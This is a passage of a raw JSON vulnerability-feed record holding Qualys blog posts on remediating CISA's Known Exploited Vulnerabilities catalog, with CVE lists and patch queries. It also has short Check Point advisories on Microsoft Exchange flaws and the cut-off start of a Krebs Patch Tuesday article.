Platform.\n\ncve:[`CVE-2021-1497`,`CVE-2021-1498`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-1782`,`CVE-2021-1870`,`CVE-2021-1871`,`CVE-2021-1879`,`CVE-2021-1905`,`CVE-2021-1906`,`CVE-2021-20016`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-21972`,`CVE-2021-21985`,`CVE-2021-22005`,`CVE-2021-22205`,`CVE-2021-22502`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-22986`,`CVE-2021-26084`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-27101`,`CVE-2021-27102`,`CVE-2021-27103`,`CVE-2021-27104`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-28663`,`CVE-2021-28664`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-30657`,`CVE-2021-30661`,`CVE-2021-30663`,`CVE-2021-30665`,`CVE-2021-30666`,`CVE-2021-30713`,`CVE-2021-30761`,`CVE-2021-30762`,`CVE-2021-30807`,`CVE-2021-30858`,`CVE-2021-30860`,`CVE-2021-30860`,`CVE-2021-30869`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40444`,`CVE-2021-40539`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42258` ]\n\n\n\nQualys patch content covers many Microsoft, Linux, and third-party applications; however, some of the vulnerabilities introduced by CISA are not currently supported out-of-the-box by Qualys. To remediate those vulnerabilities, Qualys provides the ability to deploy custom patches. The flexibility to customize patch deployment allows customers to patch the remaining CVEs in this list.\n\nNote that the due date for \u201cCategory 1\u201d patches has already passed. To find missing patches in your environment for \u201cCategory 1\u201d past due CVEs, copy the following query into the Patch Management app:\n\ncve:[&#x27;CVE-2021-1732\u2032,&#x27;CVE-2020-1350\u2032,&#x27;CVE-2020-1472\u2032,&#x27;CVE-2021-26855\u2032,&#x27;CVE-2021-26858\u2032,&#x27;CVE-2021-27065\u2032,&#x27;CVE-2020-0601\u2032,&#x27;CVE-2021-26857\u2032,&#x27;CVE-2021-22893\u2032,&#x27;CVE-2020-8243\u2032,&#x27;CVE-2021-22900\u2032,&#x27;CVE-2021-22894\u2032,&#x27;CVE-2020-8260\u2032,&#x27;CVE-2021-22899\u2032,&#x27;CVE-2019-11510&#x27;]\n\n\n\n## Federal Enterprises and Agencies Can Act Now\n\nFor federal enterprises and agencies, it&#x27;s a race against time to remediate these vulnerabilities across their respective environments and achieve compliance with this binding directive. Qualys solutions can help achieve compliance with this binding directive. Qualys Cloud Platform is FedRAMP authorized, with [107 FedRAMP authorizations](<https://marketplace.fedramp.gov/#!/product/qualys-cloud-platform?sort=-authorizations>).\n\nHere are a few steps Federal enterprises can take immediately:\n\n * Run vulnerability assessments against all your assets by leveraging various sensors such as Qualys agent, scanners, and more\n * Prioritize remediation by due dates\n * Identify all vulnerable assets automatically mapped into the threat feed\n * Use Patch Management to apply patches and other configurations changes\n * Track remediation progress through Unified Dashboards\n\n## Summary\n\nUnderstanding vulnerabilities is a critical but partial part of threat mitigation. Qualys VMDR helps customers discover, assess threats, assign risk, and remediate threats in one solution. Qualys customers rely on the accuracy of Qualys&#x27; threat intelligence to protect their digital environments and stay current with patch guidance. Using Qualys VMDR can help any organization efficiently respond to the CISA directive.\n\n## Getting Started\n\nLearn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution. Ready to get started? Sign up for a 30-day, no-cost [VMDR trial](<https://www.qualys.com/forms/vmdr/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-11-09T06:15:01", "type": "qualysblog", "title": "Qualys Response to CISA Alert: Binding Operational Directive 22-01", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2020-0601", "CVE-2020-1350", "CVE-2020-1472", "CVE-2020-8243", "CVE-2020-8260", "CVE-2021-1497", "CVE-2021-1498", "CVE-2021-1647", "CVE-2021-1675", "CVE-2021-1732", "CVE-2021-1782", "CVE-2021-1870", "CVE-2021-1871", "CVE-2021-1879", "CVE-2021-1905", "CVE-2021-1906", "CVE-2021-20016", "CVE-2021-21017", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-21972", "CVE-2021-21985", "CVE-2021-22005", "CVE-2021-22205", "CVE-2021-22502", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-22986", "CVE-2021-26084", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27059", "CVE-2021-27065", "CVE-2021-27085", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104", "CVE-2021-28310", "CVE-2021-28550", "CVE-2021-28663", "CVE-2021-28664", "CVE-2021-30116", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-30657", "CVE-2021-30661", "CVE-2021-30663", "CVE-2021-30665", "CVE-2021-30666", "CVE-2021-30713", "CVE-2021-30761", "CVE-2021-30762", "CVE-2021-30807", "CVE-2021-30858", "CVE-2021-30860", "CVE-2021-30869", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31207", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31979", "CVE-2021-33739", "CVE-2021-33742", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-36741", "CVE-2021-36742", "CVE-2021-36942", "CVE-2021-36948", "CVE-2021-36955", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649", "CVE-2021-40444", "CVE-2021-40539", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42258"], "modified": "2021-11-09T06:15:01", "id": "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-25T19:27:09", "description": "_CISA released a directive in November 2021, recommending urgent and prioritized remediation of actively exploited vulnerabilities. Both government agencies and corporations should heed this advice. This blog outlines how Qualys Vulnerability Management, Detection &amp; Response can be used by any organization to respond to this directive efficiently and effectively._\n\n### Situation\n\nLast November 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [Binding Operational Directive 22-01](<https://cyber.dhs.gov/bod/22-01/>) called \u201cReducing the Significant Risk of Known Exploited Vulnerabilities.\u201d [This directive](<https://www.cisa.gov/news/2021/11/03/cisa-releases-directive-reducing-significant-risk-known-exploited-vulnerabilities>) recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. It establishes a CISA-managed catalog of Known Exploited Vulnerabilities that carry significant risk to the federal government and sets requirements for agencies to remediate these vulnerabilities.\n\nThis directive requires federal agencies to review and update internal vulnerability management procedures to remediate each vulnerability according to the timelines outlined in CISA\u2019s vulnerability catalog.\n\n### Directive Scope\n\nThis CISA directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third parties on an agency\u2019s behalf.\n\nHowever, CISA strongly recommends that public and private businesses as well as state, local, tribal, and territorial (SLTT) governments prioritize the mitigation of vulnerabilities listed in CISA\u2019s public catalog. This is truly vulnerability management guidance for all organizations to heed.\n\n### CISA Catalog of Known Exploited Vulnerabilities\n\nIn total, CISA posted a list of [379 Common Vulnerabilities and Exposures (CVEs)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) that pose the highest risk to federal agencies. CISA\u2019s most recent update was issued on February 22, 2022.\n\nThe Qualys Research team is continuously updating CVEs to available QIDs (Qualys vulnerability identifiers) in the Qualys Knowledgebase, with the RTI field \u201cCISA Exploited\u201d and this is going to be a continuous approach, as CISA frequently amends with the latest CVE as part of their regular feeds.\n\nOut of these vulnerabilities, Directive 22-01 urges all organizations to reduce their exposure to cyberattacks by effectively prioritizing the remediation of the identified Vulnerabilities.\n\nCISA has ordered U.S. federal agencies to apply patches as soon as possible. The remediation guidance is grouped into multiple categories by CISA based on attack surface severity and time-to-remediate. The timelines are available in the [Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) for each of the CVEs.\n\n### Detect CISA Vulnerabilities Using Qualys VMDR\n\nQualys helps customers to identify and assess the risk to their organizations\u2019 digital infrastructure, and then to automate remediation. Qualys\u2019 guidance for rapid response to Directive 22-01 follows.\n\nThe Qualys Research team has released multiple remote and authenticated detections (QIDs) for these vulnerabilities. Since the directive includes 379 CVEs (as of February 22, 2022) we recommend executing your search based on QQL (Qualys Query Language), as shown here for released QIDs by Qualys **_vulnerabilities.vulnerability.threatIntel.cisaKnownExploitedVulns:&quot;true&quot;_**\n\n\n\n### CISA Exploited RTI\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can effectively prioritize those vulnerabilities using VMDR Prioritization. Qualys has introduced an **RTI Category, CISA Exploited**.\n\nThis RTI indicates that the vulnerabilities are associated with the CISA catalog.\n\n\n\nIn addition, you can locate a vulnerable host through Qualys Threat Protection by simply clicking on the impacted hosts to effectively identify and track this vulnerability.\n\n\n\nWith Qualys Unified Dashboard, you can track your exposure to CISA Known Exploited Vulnerabilities and track your status and overall management in real-time. With dashboard widgets, you can keep track of the status of vulnerabilities in your environment using the [\u201cCISA 2010-21| KNOWN EXPLOITED VULNERABILITIES\u201d](<https://success.qualys.com/support/s/article/000006791>) Dashboard.\n\n### Detailed Operational Dashboard\n\n\n\n### Remediation\n\nTo comply with this directive, federal agencies need to remediate all vulnerabilities as per the remediation timelines suggested in [CISA Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>)**.**\n\nQualys patch content covers many Microsoft, Linux, and third-party applications. However, some of the vulnerabilities introduced by CISA are not currently supported out-of-the-box by Qualys. To remediate those vulnerabilities, Qualys provides the ability to deploy custom patches. The flexibility to customize patch deployment allows customers to patch all the remaining CVEs in their list.\n\nCustomers can copy the following query into the Patch Management app to help customers comply with the directive\u2019s aggressive remediation timelines set by CISA. Running this query for specific CVEs will find required patches and allow quick and efficient deployment of those missing patches to all assets directly from within Qualys Cloud Platform.\n \n \n cve:[`CVE-2010-5326`,`CVE-2012-0158`,`CVE-2012-0391`,`CVE-2012-3152`,`CVE-2013-3900`,`CVE-2013-3906`,`CVE-2014-1761`,`CVE-2014-1776`,`CVE-2014-1812`,`CVE-2015-1635`,`CVE-2015-1641`,`CVE-2015-4852`,`CVE-2016-0167`,`CVE-2016-0185`,`CVE-2016-3088`,`CVE-2016-3235`,`CVE-2016-3643`,`CVE-2016-3976`,`CVE-2016-7255`,`CVE-2016-9563`,`CVE-2017-0143`,`CVE-2017-0144`,`CVE-2017-0145`,`CVE-2017-0199`,`CVE-2017-0262`,`CVE-2017-0263`,`CVE-2017-10271`,`CVE-2017-11774`,`CVE-2017-11882`,`CVE-2017-5638`,`CVE-2017-5689`,`CVE-2017-6327`,`CVE-2017-7269`,`CVE-2017-8464`,`CVE-2017-8759`,`CVE-2017-9791`,`CVE-2017-9805`,`CVE-2017-9841`,`CVE-2018-0798`,`CVE-2018-0802`,`CVE-2018-1000861`,`CVE-2018-11776`,`CVE-2018-15961`,`CVE-2018-15982`,`CVE-2018-2380`,`CVE-2018-4878`,`CVE-2018-4939`,`CVE-2018-6789`,`CVE-2018-7600`,`CVE-2018-8174`,`CVE-2018-8453`,`CVE-2018-8653`,`CVE-2019-0193`,`CVE-2019-0211`,`CVE-2019-0541`,`CVE-2019-0604`,`CVE-2019-0708`,`CVE-2019-0752`,`CVE-2019-0797`,`CVE-2019-0803`,`CVE-2019-0808`,`CVE-2019-0859`,`CVE-2019-0863`,`CVE-2019-10149`,`CVE-2019-10758`,`CVE-2019-11510`,`CVE-2019-11539`,`CVE-2019-1214`,`CVE-2019-1215`,`CVE-2019-1367`,`CVE-2019-1429`,`CVE-2019-1458`,`CVE-2019-16759`,`CVE-2019-17026`,`CVE-2019-17558`,`CVE-2019-18187`,`CVE-2019-18988`,`CVE-2019-2725`,`CVE-2019-8394`,`CVE-2019-9978`,`CVE-2020-0601`,`CVE-2020-0646`,`CVE-2020-0674`,`CVE-2020-0683`,`CVE-2020-0688`,`CVE-2020-0787`,`CVE-2020-0796`,`CVE-2020-0878`,`CVE-2020-0938`,`CVE-2020-0968`,`CVE-2020-0986`,`CVE-2020-10148`,`CVE-2020-10189`,`CVE-2020-1020`,`CVE-2020-1040`,`CVE-2020-1054`,`CVE-2020-1147`,`CVE-2020-11738`,`CVE-2020-11978`,`CVE-2020-1350`,`CVE-2020-13671`,`CVE-2020-1380`,`CVE-2020-13927`,`CVE-2020-1464`,`CVE-2020-1472`,`CVE-2020-14750`,`CVE-2020-14871`,`CVE-2020-14882`,`CVE-2020-14883`,`CVE-2020-15505`,`CVE-2020-15999`,`CVE-2020-16009`,`CVE-2020-16010`,`CVE-2020-16013`,`CVE-2020-16017`,`CVE-2020-17087`,`CVE-2020-17144`,`CVE-2020-17496`,`CVE-2020-17530`,`CVE-2020-24557`,`CVE-2020-25213`,`CVE-2020-2555`,`CVE-2020-6207`,`CVE-2020-6287`,`CVE-2020-6418`,`CVE-2020-6572`,`CVE-2020-6819`,`CVE-2020-6820`,`CVE-2020-8243`,`CVE-2020-8260`,`CVE-2020-8467`,`CVE-2020-8468`,`CVE-2020-8599`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-22204`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33766`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-35247`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36934`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37415`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40438`,`CVE-2021-40444`,`CVE-2021-40449`,`CVE-2021-40539`,`CVE-2021-4102`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42292`,`CVE-2021-42321`,`CVE-2021-43890`,`CVE-2021-44077`,`CVE-2021-44228`,`CVE-2021-44515`,`CVE-2022-0609`,`CVE-2022-21882`,`CVE-2022-24086`,`CVE-2010-1871`,`CVE-2017-12149`,`CVE-2019-13272` ]\n\n\n\nVulnerabilities can be validated through VMDR and a Patch Job can be configured for vulnerable assets.\n\n\n\n### Federal Enterprises and Agencies Can Act Now\n\nFor federal agencies and enterprises, it\u2019s a race against time to remediate these vulnerabilities across their respective environments and achieve compliance with this binding directive. Qualys solutions can help your organization to achieve compliance with this binding directive. Qualys Cloud Platform is FedRAMP authorized, with [107 FedRAMP authorizations](<https://marketplace.fedramp.gov/#!/product/qualys-cloud-platform?sort=-authorizations>) to our credit.\n\nHere are a few steps Federal entities can take immediately:\n\n * Run vulnerability assessments against all of your assets by leveraging our various sensors such as Qualys agent, scanners, and more\n * Prioritize remediation by due dates\n * Identify all vulnerable assets automatically mapped into the threat feed\n * Use Qualys Patch Management to apply patches and other configuration changes\n * Track remediation progress through our Unified Dashboards\n\n### Summary\n\nUnderstanding just which vulnerabilities exist in your environment is a critical but small part of threat mitigation. Qualys VMDR helps customers discover their exposure, assess threats, assign risk, and remediate threats \u2013 all in a single unified solution. Qualys customers rely on the accuracy of Qualys\u2019 threat intelligence to protect their digital environments and stay current with patch guidance. Using Qualys VMDR can help any size organization efficiently respond to CISA Binding Operational Directive 22-01.\n\n#### Getting Started\n\nLearn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution. Ready to get started? Sign up for a 30-day, no-cost [VMDR trial](<https://www.qualys.com/forms/vmdr/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2022-02-23T05:39:00", "type": "qualysblog", "title": "Managing CISA Known Exploited Vulnerabilities with Qualys VMDR", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1871", "CVE-2010-5326", "CVE-2012-0158", "CVE-2012-0391", "CVE-2012-3152", "CVE-2013-3900", "CVE-2013-3906", "CVE-2014-1761", "CVE-2014-1776", "CVE-2014-1812", "CVE-2015-1635", "CVE-2015-1641", "CVE-2015-4852", "CVE-2016-0167", "CVE-2016-0185", "CVE-2016-3088", "CVE-2016-3235", "CVE-2016-3643", "CVE-2016-3976", "CVE-2016-7255", "CVE-2016-9563", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0199", "CVE-2017-0262", "CVE-2017-0263", "CVE-2017-10271", "CVE-2017-11774", "CVE-2017-11882", "CVE-2017-12149", "CVE-2017-5638", "CVE-2017-5689", "CVE-2017-6327", "CVE-2017-7269", "CVE-2017-8464", "CVE-2017-8759", "CVE-2017-9791", "CVE-2017-9805", "CVE-2017-9841", "CVE-2018-0798", "CVE-2018-0802", "CVE-2018-1000861", "CVE-2018-11776", "CVE-2018-15961", "CVE-2018-15982", "CVE-2018-2380", "CVE-2018-4878", "CVE-2018-4939", "CVE-2018-6789", "CVE-2018-7600", "CVE-2018-8174", "CVE-2018-8453", "CVE-2018-8653", "CVE-2019-0193", "CVE-2019-0211", "CVE-2019-0541", "CVE-2019-0604", "CVE-2019-0708", "CVE-2019-0752", "CVE-2019-0797", "CVE-2019-0803", "CVE-2019-0808", "CVE-2019-0859", "CVE-2019-0863", "CVE-2019-10149", "CVE-2019-10758", "CVE-2019-11510", "CVE-2019-11539", "CVE-2019-1214", "CVE-2019-1215", "CVE-2019-13272", "CVE-2019-1367", "CVE-2019-1429", "CVE-2019-1458", "CVE-2019-16759", "CVE-2019-17026", "CVE-2019-17558", "CVE-2019-18187", "CVE-2019-18988", "CVE-2019-2725", "CVE-2019-8394", "CVE-2019-9978", "CVE-2020-0601", "CVE-2020-0646", "CVE-2020-0674", "CVE-2020-0683", "CVE-2020-0688", "CVE-2020-0787", "CVE-2020-0796", "CVE-2020-0878", "CVE-2020-0938", "CVE-2020-0968", "CVE-2020-0986", "CVE-2020-10148", "CVE-2020-10189", "CVE-2020-1020", "CVE-2020-1040", "CVE-2020-1054", "CVE-2020-1147", "CVE-2020-11738", "CVE-2020-11978", "CVE-2020-1350", "CVE-2020-13671", "CVE-2020-1380", "CVE-2020-13927", "CVE-2020-1464", "CVE-2020-1472", "CVE-2020-14750", "CVE-2020-14871", "CVE-2020-14882", "CVE-2020-14883", "CVE-2020-15505", "CVE-2020-15999", "CVE-2020-16009", "CVE-2020-16010", "CVE-2020-16013", "CVE-2020-16017", "CVE-2020-17087", "CVE-2020-17144", "CVE-2020-17496", "CVE-2020-17530", "CVE-2020-24557", "CVE-2020-25213", "CVE-2020-2555", "CVE-2020-6207", "CVE-2020-6287", "CVE-2020-6418", "CVE-2020-6572", "CVE-2020-6819", "CVE-2020-6820", "CVE-2020-8243", "CVE-2020-8260", "CVE-2020-8467", "CVE-2020-8468", "CVE-2020-8599", "CVE-2021-1647", "CVE-2021-1675", "CVE-2021-1732", "CVE-2021-21017", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-22204", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27059", "CVE-2021-27065", "CVE-2021-27085", "CVE-2021-28310", "CVE-2021-28550", "CVE-2021-30116", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31207", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31979", "CVE-2021-33739", "CVE-2021-33742", "CVE-2021-33766", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-35247", "CVE-2021-36741", "CVE-2021-36742", "CVE-2021-36934", "CVE-2021-36942", "CVE-2021-36948", "CVE-2021-36955", "CVE-2021-37415", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649", "CVE-2021-40438", "CVE-2021-40444", "CVE-2021-40449", "CVE-2021-40539", "CVE-2021-4102", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42292", "CVE-2021-42321", "CVE-2021-43890", "CVE-2021-44077", "CVE-2021-44228", "CVE-2021-44515", "CVE-2022-0609", "CVE-2022-21882", "CVE-2022-24086"], "modified": "2022-02-23T05:39:00", "id": "QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "href": "https://blog.qualys.com/category/product-tech", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2022-10-04T10:05:38", "description": "A remote code execution vulnerability exists in Microsoft Exchange. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-14T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Exchange Server Remote Code Execution (CVE-2021-34473; CVE-2021-34523)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-09-30T00:00:00", "id": "CPAI-2021-0476", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-16T19:37:58", "description": "An information disclosure vulnerability exists in Microsoft Exchange. Successful exploitation could result in the disclosure of sensitive information.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-09-05T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Exchange Information Disclosure (CVE-2021-33766)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33766"], "modified": "2021-09-05T00:00:00", "id": "CPAI-2021-0547", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-02-16T19:33:07", "description": "A remote code execution vulnerability exists in Microsoft Exchange Server. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-10T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Exchange Server Remote Code Execution (CVE-2021-28482)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28482"], "modified": "2021-05-10T00:00:00", "id": "CPAI-2021-0275", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "krebs": [{"lastseen": "2021-04-15T12:32:42", "description": "**Microsoft **today released updates to plug at least 110 security holes in its **Windows** operating systems and other products. The patches 